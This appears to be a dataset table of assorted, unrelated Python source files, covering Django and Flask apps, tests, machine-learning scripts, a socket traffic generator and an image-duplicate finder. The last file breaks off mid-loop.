text stringlengths 8 6.05M |
|---|
import os
from utils import utils
from BufferManager.bufferDS import PageData, PageHeader
from BufferManager.BufferManager import BufferManager
FILENAME = "test_1.db"
def create_file():
page_data = []
if os.path.exists(FILENAME):
return
FILE_PAGE = 160
for i in range(FILE_PAGE):
page_data.append(utils.int_to_byte(i) + bytearray(b'\00' * 8188))
print("First 12 bytes of Page data {} is {}".format(i, page_data[i][0:11]))
page_header = utils.int_to_byte(1) + utils.int_to_byte(FILE_PAGE) + bytearray(b'\x01'*8184)
with open(FILENAME, "wb") as f:
f.write(page_header)
for i in range(FILE_PAGE):
f.write(page_data[i])
def test_buffer():
create_file()
bm = BufferManager()
# print(len(bm.buffer_blocks))
print(len(BufferManager.buffer_blocks))
pageheader = BufferManager._read_file_header(FILENAME)
print(pageheader.size)
for i in range(pageheader.size):
pagedata = BufferManager.fetch_page(FILENAME, i+1)
if i+1 <= 80:
BufferManager.pin(FILENAME, i+1)
print("page no.{}, next_free_page: {}".format(i+1, pagedata.next_free_page))
print("current buffer blocks: {}".format(len(bm.buffer_blocks)))
print("total buffer blocks used: {}, replacer length: {}".format(len(BufferManager.buffer_blocks), BufferManager.replacer_len))
for i in range(pageheader.size):
# block = BufferManager._search_buffer_block(FILENAME, i+1)
# page_data = block.page
page = bytearray(b'\xff' * 8184)
new_page_data = PageData(4, page)
BufferManager.set_page(FILENAME, i+1, new_page_data)
BufferManager.flush_buffer()
for i in range(pageheader.size):
block = BufferManager._search_buffer_block(FILENAME, i+1)
if block is not None:
print("block id: {}, page_data: {}".format(i+1, block.page.data[0:12]))
BufferManager.remove_file(FILENAME)
print(len(BufferManager.buffer_blocks))
def test_create_file():
ret = BufferManager.create_file("test1.db")
header = BufferManager._read_file_header("test1.db")
print(ret)
print(header.first_free_page)
print(header.data)
pass
"""
已测试:
fetch_page
pin
kick_out_victim_LRU
remove_file
set_page
_search_buffer_block
_read_file_header
write_back_to_file
create_file
"""
test_create_file()
# test_buffer() |
from . import views
from django.urls import path,include
urlpatterns = [
path('',views.home,name='home' ),
path('observation/',views.observation,name='observation' ),
path('encounter/',views.encounter,name='encounter' ),
path('jsonviewPatient/<id>/',views.jsonviewPatient, name='jsonviewPatient' ),
path('jsonviewObservation/<id>/', views.jsonviewObservation, name='jsonviewObservation'),
path('jsonviewEncounter/<id>/', views.jsonviewEncounter, name='jsonviewEncounter'),
path('url/', views.url, name='url'),
] |
a = list(map(int,input("Enter the elements of the list: ").split()))
def bubblesort(a):
for i in range(len(a)-1,0,-1):
for j in range(i):
if a[j] > a[j+1]:
a[j] , a[j+1] = a[j+1] , a[j]
bubblesort(a)
a = list(map(int,input("Enter the elements of the list: ").split()))
def bubblesort(a):
for i in range(len(a)-1,0,-1):
for j in range(i):
if a[j] > a[j+1]:
a[j] , a[j+1] = a[j+1] , a[j]
bubblesort(a)
print(a) |
from flask import Blueprint
from flask import jsonify
from shutil import copyfile, move
from google.cloud import storage
from google.cloud import bigquery
import dataflow_pipeline.cesde.hora_hora_beam as cesde_beam
import os
import socket
import shutil
import time
# coding=utf-8
cesde_api = Blueprint('cesde_api', __name__)
fileserver_baseroute = ("//192.168.20.87", "/media")[socket.gethostname()=="contentobi"]
@cesde_api.route("/hora_hora")
def hora_hora():
response = {}
response["code"] = 400
response["description"] = "No se encontraron ficheros"
response["status"] = False
local_route = fileserver_baseroute + "/BI_Archivos/GOOGLE/Cesde/Procesado/"
archivos = os.listdir(local_route)
for archivo in archivos:
if archivo.endswith(".csv"):
Fecha = str(archivo[21:])
Fecha = Fecha.replace(".csv","")
storage_client = storage.Client()
bucket = storage_client.get_bucket('ct-cesde')
nombre = 'gs://ct-cesde/' + archivo
# Subir fichero a Cloud Storage antes de enviarlo a procesar a Dataflow
blob = bucket.blob(archivo)
blob.upload_from_filename(local_route + archivo)
try:
deleteQuery = "DELETE FROM `contento-bi.cesde.hora_hora` WHERE SUBSTR(Fecha_de_inicio,0,10) = '" + Fecha + "'"
client = bigquery.Client()
query_job = client.query(deleteQuery)
query_job.result()
except:
print("no se encontraron datos para eliminar.")
mensaje = cesde_beam.run(nombre, Fecha)
time.sleep(30)
# shutil.rmtree(local_route + archivo)
blob.delete()
return jsonify(response), response["code"]
|
import math
import os.path
import torch
import torch.nn as nn
from torch.utils.cpp_extension import load
_path = os.path.join(
os.path.abspath(os.path.dirname(__file__)), "csrc/gpt_gelu_cuda.cu"
)
# JIT compiler
_gelu = load(
name="gelu",
sources=[_path],
extra_cflags=['-O3'],
extra_cuda_cflags=["-O3", "--use_fast_math"]
)
class _GPT_GELU(torch.autograd.Function):
@staticmethod
def forward(ctx, X):
ctx.save_for_backward(X)
Y = _gelu.gpt_gelu_forward(X)
return Y
@staticmethod
def backward(ctx, dY):
X = ctx.saved_tensors[0]
dX = _gelu.gpt_gelu_backward(dY, X)
return dX
gpt_gelu = _GPT_GELU.apply |
import os
import socket
import SocketServer
import time
import thread
import random
import select
from Traffic import *
def gen_buf(size=1024*1024):
# return ''.join(['%c'%random.randint(0, 255) for n in xrange(size)])
return ''.join(['\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0' for n in xrange(size / 16 + 1)])
class TrafficSock:
def __init__(self, sock=None, buf=None):
if sock == None:
try:
self.sock = socket.socket(socket.AF_INET6)
except:
self.sock = socket.socket(socket.AF_INET)
else:
self.sock = sock
if buf == None:
self.buf = gen_buf(1024*1024)
else:
self.buf = buf
self.rcvsize = 1024*1024
self.sink_active = False
self.source_active = False
def active_open(self, addr):
self.sock.connect(addr)
def passive_open(self, rmt_host=None):
self.sock.listen(1)
while True:
(newsock, newaddr) = self.sock.accept()
if rmt_host == None or newaddr[0] == rmt_host:
break
newsock.close()
self.sock.close()
self.sock = newsock
def sink(self, maxbytes=None, maxtime=None):
self.sink_active = True
bytes = 0
start_time = time.time()
while (maxbytes == None or bytes < maxbytes) and \
(maxtime == None or time.time() - start_time < maxtime):
n = self.rcvsize
if maxbytes != None:
n = min(n, maxbytes - bytes)
n = len(self.sock.recv(n, socket.MSG_WAITALL))
bytes += n
if n == 0:
break
self.sink_active = False
def source(self, maxbytes=None, maxtime=None):
self.source_active = True
bytes = 0
start_time = time.time()
while (maxbytes == None or bytes < maxbytes) and \
(maxtime == None or time.time() - start_time < maxtime):
n = len(self.buf)
if maxbytes != None:
n = min(n, maxbytes - bytes)
bytes += self.sock.send(self.buf[:n])
self.source_active = False
class TrafficServerSock:
def __init__(self, laddr, buf=None, sink=True, source=False, \
spawn=True, ns_cb=None):
self.laddr = laddr
self.buf = buf
self.sink = sink
self.source = source
self.spawn = spawn
self.ns_cb = ns_cb
self.done = False
def sink_close(self, ts):
ts.sink()
if not (ts.sink_active or ts.souce_active):
ts.sock.close()
def source_close(self, ts):
ts.source()
if not (ts.sink_active or ts.source_active):
ts.sock.close()
def serve(self):
self.lsock = socket.socket()
self.lsock.bind(self.laddr)
self.lsock.listen(5)
while not self.done:
(sock, addr) = self.lsock.accept()
if self.ns_cb != None:
self.ns_cb(sock, addr)
ts = TrafficSock(sock, self.buf)
if self.spawn:
if self.sink:
thread.start_new_thread(self.sink_close, (ts,))
if self.source:
thread.start_new_thread(self.source_close, (ts,))
else:
if self.sink:
self.sink_close(ts)
if self.source:
self.source_close(ts)
def stop(self):
self.done = True
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 16/5/1 下午7:42
# @Author : ZHZ
import nltk
from nltk.collocations import *
from nltk.metrics import TrigramAssocMeasures, spearman_correlation, ranks_from_scores, BigramAssocMeasures
from nltk.corpus import stopwords, webtext
text = "hello world I love you hello world hello world I"
#
# scorer = BigramAssocMeasures.likelihood_ratio
# compare_scorer = BigramAssocMeasures.raw_freq
#
# while True:
# words = "hello world I love you hello world hello world I"
# cf = BigramCollocationFinder.from_words(words)
# cf.apply_freq_filter(3)
#
# corr = spearman_correlation(ranks_from_scores(cf.score_ngrams(scorer)),
# ranks_from_scores(cf.score_ngrams(compare_scorer)))
# print(file)
# print('\t', [' '.join(tup) for tup in cf.nbest(scorer, 15)])
# print('\t Correlation to %s: %0.4f' % (compare_scorer.__name__,
# corr)) # text= "Everyone has their own dreams, I am the same. But my dream is not a lawyer, not a doctor, not actors, not even an industry. Perhaps my dream big people will find it ridiculous, but this has been my pursuit! My dream is to want to have a folk life! I want it to become a beautiful painting, it is not only sharp colors, but also the colors are bleak, I do not rule out the painting is part of the black, but I will treasure these bleak colors! Not yet, how about, a colorful painting, if not bleak, add color, how can it more prominent American? Life is like painting, painting the bright red color represents life beautiful happy moments. Painting a bleak color represents life difficult, unpleasant time. You may find a flat with a beautiful road is not very good yet, but I do not think it will. If a person lives flat then what is the point? Life is only a short few decades, I want it to go Finally, Each memory is a solid."
# break
trigram_measures = nltk.collocations.TrigramAssocMeasures()
finder = TrigramCollocationFinder.from_words(text.split())
print finder.nbest(trigram_measures.chi_sq, 2)
print finder.score_ngrams(TrigramAssocMeasures.mi_like)
#
# bigram_measures = nltk.collocations.BigramAssocMeasures()
# finder = BigramCollocationFinder.from_words(text.split())
# print finder.nbest(bigram_measures.student_t, 2)
# print finder.score_ngrams(BigramAssocMeasures.mi_like)
|
# BSD 3-Clause License.
#
# Copyright (c) 2019-2023 Robert A. Milton. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products derived from this
# software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,
# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
""" **Context managers** """
from __future__ import annotations
from romcomma.base.definitions import *
from time import time
from datetime import timedelta
from contextlib import contextmanager
@contextmanager
def Timer(name: str = '', is_inline: bool = True):
""" Context Manager for timing operations.
Args:
name: The name of this context, ``print``ed as what is being timed. The (default) empty string will not be timed.
is_inline: Whether to report timing inline (the default), or with linebreaks to top and tail a paragraph.
"""
_enter = time()
if name != '':
if is_inline:
print(f'Running {name}', end='', flush=True)
else:
print(f'Running {name}...')
yield
if name != '':
_exit = time()
if is_inline:
print(f' took {timedelta(seconds=int(_exit-_enter))}.')
else:
print(f'...took {timedelta(seconds=int(_exit-_enter))}.')
@contextmanager
def Environment(name: str = '', device: str = '', **kwargs):
""" Context Manager setting up the environment to run operations.
Args:
name: The name of this context, ``print``ed as what is being run. The (default) empty string will not be timed.
device: The device to run on. If this ends in the regex ``[C,G]PU*`` then the logical device ``/[C,G]PU*`` is used,
otherwise device allocation is automatic.
**kwargs: Is passed straight to the implementation GPFlow manager. Note, however, that ``float=float32`` is inoperative due to SciPy.
``eager=bool`` is passed to `tf.config.run_functions_eagerly <https://www.tensorflow.org/api_docs/python/tf/config/run_functions_eagerly>`_.
"""
with Timer(name):
kwargs = kwargs | {'float': 'float64'}
eager = kwargs.pop('eager', None)
tf.config.run_functions_eagerly(eager)
print(' using GPFlow(' + ', '.join([f'{k}={v!r}' for k, v in kwargs.items()]), end=')')
device = '/' + device[max(device.rfind('CPU'), device.rfind('GPU')):]
if len(device) > 3:
device_manager = tf.device(device)
print(f' on {device}', end='')
else:
device_manager = Timer()
implementation_manager = gf.config.as_context(gf.config.Config(**kwargs))
print('...')
with device_manager:
with implementation_manager:
yield
print('...Running ' + name, end='')
|
import numpy as np
from batchgenerators.augmentations.utils import rotate_coords_3d, rotate_coords_2d, scale_coords, \
elastic_deform_coordinates, create_zero_centered_coordinate_mesh, interpolate_img
class MirrorTransform(object):
def augment_mirroring(self, data, code=(1, 1, 1)):
if code[0] == 1:
data[:] = data[::-1]
if code[1] == 1:
data[:, :] = data[:, ::-1]
if code[2] == 1:
data[:, :, :] = data[:, :, ::-1]
return data
def rand_code(self):
code = []
for i in range(3):
if np.random.uniform() < 0.5:
code.append(1)
else:
code.append(0)
return code
class SpatialTransform(object):
def __init__(self, patch_center_dist_from_border=30,
do_elastic_deform=True, alpha=(0., 1000.), sigma=(10., 13.),
do_rotation=True, angle_x=(0, 2 * np.pi), angle_y=(0, 2 * np.pi), angle_z=(0, 2 * np.pi),
do_scale=True, scale=(0.75, 1.25), border_mode_data='nearest', border_cval_data=0, order_data=3,
border_mode_seg='constant', border_cval_seg=0, order_seg=0, random_crop=True, data_key="data",
label_key="seg", p_el_per_sample=1, p_scale_per_sample=1, p_rot_per_sample=1,
independent_scale_for_each_axis=False, p_rot_per_axis:float=1):
self.independent_scale_for_each_axis = independent_scale_for_each_axis
self.p_rot_per_sample = p_rot_per_sample
self.p_scale_per_sample = p_scale_per_sample
self.p_el_per_sample = p_el_per_sample
self.data_key = data_key
self.label_key = label_key
self.patch_center_dist_from_border = patch_center_dist_from_border
self.do_elastic_deform = do_elastic_deform
self.alpha = alpha
self.sigma = sigma
self.do_rotation = do_rotation
self.angle_x = angle_x
self.angle_y = angle_y
self.angle_z = angle_z
self.do_scale = do_scale
self.scale = scale
self.border_mode_data = border_mode_data
self.border_cval_data = border_cval_data
self.order_data = order_data
self.border_mode_seg = border_mode_seg
self.border_cval_seg = border_cval_seg
self.order_seg = order_seg
self.p_rot_per_axis = p_rot_per_axis
def augment_spatial(self, data, coords, is_label=False):
if is_label:
order = self.order_seg
border_mode = self.border_mode_seg
border_cval = self.border_cval_seg
else:
order= self.order_data
border_mode = self.border_mode_data
border_cval = self.border_cval_data
data = interpolate_img(data, coords, order, border_mode, cval=border_cval)
return data
def rand_coords(self, patch_size):
dim = len(patch_size)
# print(dim)
coords = create_zero_centered_coordinate_mesh(patch_size)
if self.do_elastic_deform and np.random.uniform() < self.p_el_per_sample:
a = np.random.uniform(self.alpha[0], self.alpha[1])
s = np.random.uniform(self.sigma[0], self.sigma[1])
coords = elastic_deform_coordinates(coords, a, s)
if self.do_rotation and np.random.uniform() < self.p_rot_per_sample:
if np.random.uniform() <= self.p_rot_per_axis:
a_x = np.random.uniform(self.angle_x[0], self.angle_x[1])
else:
a_x = 0
if dim == 3:
if np.random.uniform() <= self.p_rot_per_axis:
a_y = np.random.uniform(self.angle_y[0], self.angle_y[1])
else:
a_y = 0
if np.random.uniform() <= self.p_rot_per_axis:
a_z = np.random.uniform(self.angle_z[0], self.angle_z[1])
else:
a_z = 0
coords = rotate_coords_3d(coords, a_x, a_y, a_z)
else:
coords = rotate_coords_2d(coords, a_x)
if self.do_scale and np.random.uniform() < self.p_scale_per_sample:
if not self.independent_scale_for_each_axis:
if np.random.random() < 0.5 and self.scale[0] < 1:
sc = np.random.uniform(self.scale[0], 1)
else:
sc = np.random.uniform(max(self.scale[0], 1), self.scale[1])
else:
sc = []
for _ in range(dim):
if np.random.random() < 0.5 and self.scale[0] < 1:
sc.append(np.random.uniform(self.scale[0], 1))
else:
sc.append(np.random.uniform(max(self.scale[0], 1), self.scale[1]))
coords = scale_coords(coords, sc)
ctr = np.asarray([patch_size[0]//2, patch_size[1]//2, patch_size[2]//2])
coords += ctr[:, np.newaxis, np.newaxis, np.newaxis]
return coords
class Crop(object):
def __init__(self, patch_size):
self.patch_size = patch_size
def augment_crop(self, data, code=(1, 1, 1)):
data = data[code[0]:code[0] + self.patch_size[0], code[1]:code[1] + self.patch_size[1], code[2]:code[2] + self.patch_size[2]]
return data
def rand_code(self, shape):
n_x = np.random.randint(0, shape[2] - self.patch_size[2], 1)[0]
n_y = np.random.randint(0, shape[1] - self.patch_size[1], 1)[0]
n_z = np.random.randint(0, shape[0] - self.patch_size[0], 1)[0]
code = [n_z, n_y, n_x]
return code
|
class Solution(object):
def hasCycle(self, head):
slow, fast = head, head
while fast != None and fast.next != None:
slow = slow.next
fast = fast.next.next
if slow == fast:
return True
return False
class Solution(object):
def hasCycle(self, head):
cur = head
while cur:
if cur.val == 'C':
return True
cur.val = 'C'
cur = cur.next
return False |
import datetime
first_day = datetime.date(2016, 10, 9)
last_dat = datetime.date(2016, 10, 15)
time_delta = datetime.timedelta(weeks=1)
OUTPUT_FORMAT = '%m/%d/%Y'
for i in range(63, 3678, 1):
print('week %d: %s-%s' %
(i, first_day.strftime(OUTPUT_FORMAT), last_dat.strftime(OUTPUT_FORMAT)))
first_day += time_delta
last_dat += time_delta
|
n,k=map(int,input().split())
li=list(map(int,input().split()))
a=0
for i in range(0,n):
for j in range(1,n):
if li[i]+li[j]==k and i!=j:
a=1
break
print("yes" if a else "no")
|
import requests
def urlunshorten(url):
return requests.head(url, allow_redirects=True).url
|
# -*- coding: utf-8 -*-
"""
Created on Sun Sep 1 00:56:35 2019
@author: sazid
"""
import os
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import sklearn
import sklearn.datasets
import sklearn.linear_model
from sklearn.model_selection import train_test_split
def relu(Z):
return np.maximum(0, Z)
def sigmoid(Z):
Z = 1 / (1 + np.exp(-Z))
#print(Z)
#print("Z shape = "+ str(Z.shape))
return Z
def propagate( w, b, X, Y):
m = X.shape[1]
# print(m)
Z = np.dot( w.T, X) + b
#print(Z.shape)
#print(Z)
A = relu(Z)
#print('A shape = ' + str(A.shape))
#print('Y shape' + str(Y.shape))
#print(A)
cost = (-1/m)* np.sum( (Y * np.log(A)) + ((1 - Y)* np.log(1 - A)) )
#print('first cost value = ' + str(cost))
dZ = A - Y
#print("dZ = " + str(dZ.shape))
dw = (1/m)* np.dot(X, dZ.T)
#print("dw =" + str(dw.shape))
db = (1/m)* np.sum(dZ)
#print("db =" + str(db.shape))
#print("db = "+ str(db))
assert(dw.shape == w.shape)
assert(db.dtype == float)
cost = np.squeeze(cost)
assert(cost.shape == ())
grads = {"dw": dw, "db" : db}
return grads, cost
def optimize(w, b, X, Y, iteration, learning_rate, print_cost = True):
costs = []
for i in range(iteration):
# Cost and gradient calculation
grads, cost = propagate(w , b ,X ,Y)
# Retrieve derivatives from grads
dw = grads["dw"]
db = grads["db"]
# update
w = w - (learning_rate*dw)
b = b - (learning_rate*db)
# Record the costs
if i % 100 == 0:
costs.append(cost)
# Print the cost every 100 training iterations
if print_cost and i % 100 == 0:
print ("Cost after iteration %i: %f" %(i, cost))
params = {"w": w,
"b": b}
grads = {"dw": dw,
"db": db}
return params, grads, costs
def initialize_parameters(dim):
#normal Init
#w = np.random.randn(dim, 1)*0.01
#print(W.shape)
#print(W)
#b = 0
#b = np.zeros((1,1))
#print(b.shape)
#print(b)
# HE initialization
#w = np.random.randn(dim , 1)*np.sqrt(2/960)
#b = 0
#Xavier initialization
w = np.random.randn(dim , 1)*np.sqrt(1/960)
b = 0
assert(w.shape == (dim, 1))
assert(isinstance(b, float) or isinstance(b, int))
return w, b
def predict( w, b, X):
m = X.shape[1]
Y_prediction = np.zeros((1,m))
w = w.reshape(X.shape[0], 1)
Z = np.dot( w.T, X)
#print("Z shape predict = " + str(Z.shape))
A = relu(Z)
#print("A shape" + str(A.shape))
for i in range(A.shape[1]):
# Convert probabilities A[0,i] to actual predictions p[0,i]
Y_prediction[0, i] = 1 if A[0, i] > 0.5 else 0
### END CODE HERE ###
assert(Y_prediction.shape == (1, m))
return Y_prediction
def NN_model_zero(X_train, Y_train, X_test, Y_test, iteration, learning_rate):
hidden_layer = 1;
hidden_unit = 1;
dim = 4
w, b = initialize_parameters(dim)
#print(w.shape)
#print(b.shape)
parameters, grads, costs = optimize(w, b, X_train, Y_train, iteration, learning_rate, print_cost = True)
w = parameters["w"]
b = parameters["b"]
Y_prediction_test = predict(w , b, X_test)
Y_prediction_train = predict(w, b, X_train)
print("Y_prediction_train_shape = " + str(Y_prediction_train.shape))
# Print train/test Errors
print("train accuracy: {} %".format(100 - np.mean(np.abs(Y_prediction_train - Y_train)) * 100))
print("test accuracy: {} %".format(100 - np.mean(np.abs(Y_prediction_test - Y_test)) * 100))
d = {"costs": costs,
"Y_prediction_test": Y_prediction_test,
"Y_prediction_train" : Y_prediction_train,
"w" : w,
"b" : b,
"learning_rate" : learning_rate,
"iteration": iteration}
return d
def data_input_and_process_function():
a = np.loadtxt("/kaggle/input/data_banknote_authentication.txt",delimiter=',')
#print(a.shape)
#print(a)
#checking nan values
#print(np.isnan(a).any())
y = np.array(a[:,4]).reshape(1372,1)
#print(y.shape)
#print(y)
a = np.delete(a, 4, 1)
#print(a.shape)
#print(a)
train_set_X, test_set_X, train_set_Y, test_set_Y = train_test_split(a, y, test_size=0.3)
#print(train_set_X.shape)
#print(test_set_X.shape)
#print(train_set_Y.shape)
#print(test_set_Y.shape)
train_set_X = train_set_X.reshape(4, 960)
test_set_X = test_set_X.reshape(4, 412)
train_set_Y = train_set_Y.reshape(1, 960)
test_set_Y = test_set_Y.reshape(1, 412)
#print(train_set_X.shape)
#print(test_set_X.shape)
#print(train_set_Y.shape)
#print(test_set_Y.shape)
#Normalize
train_set_X = train_set_X - np.mean(train_set_X)
train_set_X = train_set_X / np.std(train_set_X)
test_set_X = test_set_X - np.mean(test_set_X)
test_set_X = test_set_X / np.std(test_set_X)
return train_set_X, test_set_X, train_set_Y, test_set_Y
def main_func_call():
train_set_X, test_set_X, train_set_Y, test_set_Y = data_input_and_process_function()
d = NN_model_zero(train_set_X, train_set_Y, test_set_X, test_set_Y, iteration = 9500, learning_rate = 0.001)
costs = np.squeeze(d['costs'])
plt.plot(costs)
plt.ylabel('cost')
plt.xlabel('iterations (per hundreds)')
plt.title("Learning rate =" + str(d["learning_rate"]))
plt.show()
main_func_call()
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import time
from openerp.report import report_sxw
class spm_report(report_sxw.rml_parse):
def __init__(self, cr, uid, name, context=None):
if context is None:
context = {}
super(spm_report, self).__init__(cr, uid, name, context=context)
self.localcontext.update({
'time': time,
'get_psm': self.get_psm,
})
def get_psm(self, pickings):
pool = pooler.get_pool(self.cr.dbname)
products = []
res = []
aux = []
for picking in pickings:
ml_ids = picking.move_lines
for ml_id in ml_ids:
products.append(ml_id.product_id)
products = list(set(products))
for product in products:
aux = self._get_serial(picking, product)
if aux:
val = {
'product': pool.get('product.product').browse(self.cr, self.uid, [product.id])[0].name,
'nro_prod': len(aux),
'serial': ' | '.join(aux)
}
if val:
res.append(val)
val = {}
return res
def _get_serial(self, picking, product):
res = []
ml_ids = picking.move_lines
for ml_id in ml_ids:
if ml_id.product_id == product:
if ml_id.prodlot_id.name:
res.append(ml_id.prodlot_id.name)
return res
report_sxw.report_sxw('report.spm_report',
'stock.picking',
'addons/psm/report/picking.rml',
parser=spm_report)
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
from datetime import date
import pandas as pd
today = date.today()
d1 = today.strftime("%d/%m/%Y")
print("Today's date:", d1)
|
import os
# Adapted from Miguel Grinberg: Flask Web Development, Second Edition (O'Reilly).
class Config:
DEBUG = False
TESTING = False
JWT_SECRET_KEY = os.environ['JWT_SECRET_KEY']
LOG_FILE_PATH = os.environ['LOG_FILE_PATH']
SENTRY_DSN = os.getenv('SENTRY_DSN')
@staticmethod
def init_app(app):
pass
class DevelopmentConfig(Config):
DEBUG = True
SQLALCHEMY_DATABASE_URI = os.environ['DEV_DATABASE_URI']
class TestingConfig(Config):
TESTING = True
SQLALCHEMY_DATABASE_URI = os.environ['TEST_DATABASE_URI']
class ProductionConfig(Config):
SQLALCHEMY_DATABASE_URI = os.environ['DATABASE_URI']
config = {
'development': DevelopmentConfig,
'testing': TestingConfig,
'production': ProductionConfig,
'default': DevelopmentConfig
}
|
from django.test import TestCase
from calc.forms import INVALID_INPUT_ERROR, CalcInjForm, CRISimpleForm, CRIAdvancedForm, CRICPRForm, CRIMetoclopramideForm
class CalcInjFormTest(TestCase):
def test_form_rejects_non_numeric_input(self):
form = CalcInjForm(data={'weight': 'a string'})
self.assertFalse(form.is_valid())
self.assertEqual(form.errors['weight'], [INVALID_INPUT_ERROR])
def test_form_rejects_empty_string(self):
form = CalcInjForm(data={'weight': ''})
self.assertFalse(form.is_valid())
class CRISimpleFormTest(TestCase):
def test_form_rejects_non_numeric_input(self):
form = CRISimpleForm(data={'weight': 'a string'})
self.assertFalse(form.is_valid())
self.assertEqual(form.errors['weight'], [INVALID_INPUT_ERROR])
def test_form_rejects_empty_string(self):
form = CRISimpleForm(data={'weight': ''})
self.assertFalse(form.is_valid())
class CRIAdvancedFormTest(TestCase):
def test_form_rejects_non_numeric_input(self):
form = CRIAdvancedForm(data={'weight': 'wait',
'rate': 'eight',
'vol': 'volume',
'infusion': 'fusion'})
self.assertFalse(form.is_valid())
def test_form_rejects_empty_string(self):
form = CRIAdvancedForm(data={'weight': '',
'rate': '',
'vol': '',
'infusion': ''})
self.assertFalse(form.is_valid())
class CRIInsulinFormTest(TestCase):
def test_form_rejects_non_numeric_input(self):
form = CRIAdvancedForm(data={'weight': 'wait',
'rate': 'eight',
'vol': 'volume',
'replacement': 'enplacement'})
self.assertFalse(form.is_valid())
def test_form_rejects_empty_string(self):
form = CRIAdvancedForm(data={'weight': '',
'rate': '',
'vol': '',
'replacement': ''})
self.assertFalse(form.is_valid())
class CRICPRFormTest(TestCase):
def test_form_rejects_non_numeric_input(self):
form = CRICPRForm(data={'weight': 'wait',
'rate': 'eight',
'vol': 'volume',
'dobutamine': 'nobutamine',
'dopamine': 'nopamine',
'lidocaine': 'hidocaine'})
self.assertFalse(form.is_valid())
def test_form_rejects_empty_string(self):
form = CRICPRForm(data={'weight': '',
'rate': '',
'vol': '',
'dobutamine': '',
'dopamine': '',
'lidocaine': ''})
self.assertFalse(form.is_valid())
class CRIMetoclopramideTest(TestCase):
def test_form_rejects_non_numeric_input(self):
form = CRIMetoclopramideForm(data={'weight': 'wait',
'rate': 'eight',
'volume': 'volume',
'infusion': 'fusion',
'inc_volume': 'volume',
'inc_infusion': 'fusion'})
self.assertFalse(form.is_valid())
def test_form_rejects_empty_string(self):
form = CRIMetoclopramideForm(data={'weight': '',
'rate': '',
'volume': '',
'infusion': '',
'inc_volume': 100,
'inc_infusion': 1})
self.assertFalse(form.is_valid())
def test_increase_volume_and_infusion_fields_are_optional(self):
form = CRIMetoclopramideForm(data={'weight': 4.0,
'rate': 10,
'volume': 100,
'infusion': 4,
'inc_volume': '',
'inc_infusion': ''})
self.assertTrue(form.is_valid())
|
import datetime
import glob
import json
from threading import *
from tkinter import *
from tkinter import filedialog as fd
import cv2
from skimage.metrics import structural_similarity
# Variables and Objects
global imageFilesInWorkingFolder
pathToWorkingFolder = ""
image_score_dict = {}
# Searches through the designated work path and adds all files with specific post-fix to a list
def listOfAllImageFiles():
labelStatus.config(text="Searching for viable images 1/3")
tk_root.update_idletasks()
global imageFilesInWorkingFolder
imageFilesInWorkingFolder = "" # CLean Up of the list
imageFilesInWorkingFolder = [f for f in glob.glob(pathToWorkingFolder + "/**/*.png", recursive=True)]
labelStatus.config(text="Searching for viable images 2/3")
tk_root.update_idletasks()
imageFilesInWorkingFolder += [f for f in glob.glob(pathToWorkingFolder + "/**/*.jpg", recursive=True)]
labelStatus.config(text="Searching for viable images 3/3")
tk_root.update_idletasks()
imageFilesInWorkingFolder += [f for f in glob.glob(pathToWorkingFolder + "/**/*.jpeg", recursive=True)]
print(imageFilesInWorkingFolder)
# adds the path of imageA to the dictionary. imageA shall be the path and therefore an unique ID. this method
# is needed to access the "key" imageA and append the paths of similar images
def createNewKeyInDict(key, dict):
dict[key] = []
# appends a value to the key of the dictionary
def addValueToDictKey(key, value, score, dict):
dict[key].append((value, score))
def checkDictForExistingKeys(key):
if key in image_score_dict:
return True
else:
return False
def checkDictForExistingValues(value, dict):
for i in dict.values():
if value in i:
return True
else:
return False
def dumpToJSON():
global image_score_dict
with open(pathToWorkingFolder + "/1_duplicates.json", 'w') as outfile:
json.dump(image_score_dict, outfile)
# Essentially takes all the filenames in the specified folder and runs it through the imageComparison Algorithm.
# It then fills a dictionary with images and their duplicates
def startSearchForDupes():
start = datetime.datetime.now()
labelStatus.config(text="Start Scan")
tk_root.update_idletasks() # updates GUI
imageSize = 200
imageSize = (imageSize, imageSize)
tk_root.update_idletasks()
listOfAllImageFiles()
for i in range(0, len(imageFilesInWorkingFolder)):
# print("I-File: " + str(i+1) + " of: " + str(len(imageFilesInWorkingFolder)))
